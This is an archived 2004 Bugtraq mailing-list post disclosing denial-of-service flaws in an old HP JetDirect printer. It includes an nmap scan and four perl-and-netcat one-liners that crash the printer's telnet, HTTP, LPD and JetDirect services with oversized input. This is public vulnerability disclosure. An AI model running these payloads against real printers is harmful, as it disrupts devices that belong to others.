lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.BSO.4.58.0410011253080.17995@voodoo.mediaservice.net>
Date: Fri, 1 Oct 2004 13:04:59 +0200 (CEST)
From: Marco Ivaldi <raptor@...eadbeef.info>
To: bugtraq@...urityfocus.com
Subject: Re: Promiscuous email printing in Canon imageRunner


> Try scanning the Ip address with nmap -A 10.0.0.1

Hello Bugtraq,

While we're talking about printers, some time ago i discovered by accident 
some lame Denial of Service vulnerabilities in my HP JetDirect printer 
(tested on J3111A, firmware version G.05.35 -- pretty old). Not sure if 
they can be reproduced on newer models/firmwares.

Here we go:

root@...ron:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?   
9100/tcp open  jetdirect? 
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

# telnet -> crash of all network services
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23

# http -> crash of all network services with funny stack dump on paper! ;)
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80

# printer -> the printer switches indefinitely between data recv and ready
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515

# jetdirect -> prints ABCD... and leaves the printer in "unstable" status
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

I've scanned the funny stack dump printed on paper and put it on-line at:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

You should also take a look to Paul Szabo's excellent web resources on 
PostScript, PJL/PCL, and secure HP printers configuration:

http://www.maths.usyd.edu.au:8000/u/psz/ps.html

Cheers,

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ